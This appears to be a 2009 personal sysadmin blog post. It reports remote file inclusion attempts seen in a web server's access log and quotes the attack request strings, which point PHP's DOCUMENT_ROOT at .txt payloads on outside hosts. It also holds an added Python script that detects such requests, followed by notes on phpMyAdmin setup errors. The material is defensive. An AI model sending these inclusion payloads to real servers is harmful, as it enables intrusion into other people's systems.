21-Aug-2009

Korean visitors
Checking yesterday’s system load this morning, I found there had been a spike in buffered IO at about 22:30. I checked the webserver access log and found just one address, 203.236.100.30, that fired requests, hoping one would pass it to another machine to break in. All requests contain a string:

/?_SERVER[DOCUMENT_ROOT]=http://www.nglschool.co.kr/zfxid.txt?

This morning, even more similar attempts were made: address 211.206.123.177 appeared at 5:30, keeping the system even busier for a while, trying to script:

/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt??

Using WHOIS, it looks like both addresses are registered in Korea: the first one is registered to kornet.kr, the second one to broadnet.com.
There have been some more attempts, none of them as heavy as the second one mentioned: that one boosted the server to handling 300 requests per minute, on a small system like this, accessing the PHP and Wiki engines. Without a problem: all requests ended in a 403 error.
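
One way to pull these requests out of an access log and confirm that each one was refused, as an added example that is not part of the original post. The log format (Apache combined), the list of PHP superglobal names and the sample lines are assumptions; only the two addresses and their request strings come from the post.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl

# Constructed sample (Apache combined format). The first two addresses and
# their request strings are from the post; timestamps, sizes and the last
# three lines (documentation addresses, example.com) are made up.
SAMPLE_LOG = """\
203.236.100.30 - - [20/Aug/2009:22:30:01 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.nglschool.co.kr/zfxid.txt? HTTP/1.1" 403 202 "-" "-"
203.236.100.30 - - [20/Aug/2009:22:30:02 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.nglschool.co.kr/zfxid.txt? HTTP/1.1" 403 202 "-" "-"
211.206.123.177 - - [21/Aug/2009:05:30:10 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 403 202 "-" "-"
211.206.123.177 - - [21/Aug/2009:05:30:11 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 403 202 "-" "-"
211.206.123.177 - - [21/Aug/2009:05:30:12 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 403 202 "-" "-"
211.206.123.177 - - [21/Aug/2009:05:31:12 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 403 202 "-" "-"
198.51.100.7 - - [21/Aug/2009:06:00:00 +0200] "GET /index.php?%5FSERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fexample.com%2Fx.txt HTTP/1.1" 200 512 "-" "-"
192.0.2.10 - - [21/Aug/2009:06:01:00 +0200] "GET /wiki/index.php?title=Main_Page HTTP/1.1" 200 4096 "-" "-"
192.0.2.10 - - [21/Aug/2009:06:01:05 +0200] "GET /index.php?url=http://example.com/ HTTP/1.1" 200 1024 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')
SUPERGLOBAL_RE = re.compile(
    r'^(_SERVER|_GET|_POST|_COOKIE|_REQUEST|_ENV|_FILES|_SESSION|GLOBALS)(\[|$)')
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.I)

def is_superglobal_rfi(target):
    """True if a query parameter sets a PHP superglobal to a remote URL."""
    query = target.partition('?')[2]
    # parse_qsl percent-decodes names and values, so %5FSERVER%5B... matches too
    return any(SUPERGLOBAL_RE.match(name) and REMOTE_RE.match(value)
               for name, value in parse_qsl(query, keep_blank_values=True))

def summarize(log_text):
    """Per client: flagged requests, peak per-minute rate, count not answered 4xx/5xx."""
    per_minute = defaultdict(Counter)
    not_blocked = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not is_superglobal_rfi(m.group(3)):
            continue
        ip, ts, _target, status = m.groups()
        per_minute[ip][ts[:17]] += 1          # bucket by dd/Mon/yyyy:HH:MM
        not_blocked[ip] += int(status) < 400  # a 2xx/3xx answer needs a closer look
    return {ip: {"count": sum(c.values()), "peak_per_minute": max(c.values()),
                 "not_blocked": not_blocked[ip]} for ip, c in per_minute.items()}

if __name__ == "__main__":
    for ip, stats in summarize(SAMPLE_LOG).items():
        print(ip, stats)
```

A non-zero `not_blocked` value means the server answered at least one such request with something other than an error, which is the case worth investigating first.
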
The next hurdle on PHP
As found yesterday, it seems to work: PHP_INFO shows what it should show. So it’s time to handle the real stuff: I downloaded the latest version of phpMyAdmin and had it access the database on Diana in its configuration. After some mapping issues, phpMyAdmin did start, but next issued an error “extension “Session” cannot be loaded; check your configuration” though the file does exist and the webservers do have READ + EXECUTE access to all files – and the directory path to them. So I thought, but some seemed to be missing the required ACL, so I added the lines. Next, phpMyAdmin complains that the MySQL extension couldn’t be loaded – and it is obvious I need just that one.

If that doesn’t work, there is no need to test WordPress….